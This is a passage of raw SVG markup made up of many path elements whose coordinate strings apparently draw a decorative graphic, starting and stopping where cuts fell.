2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path 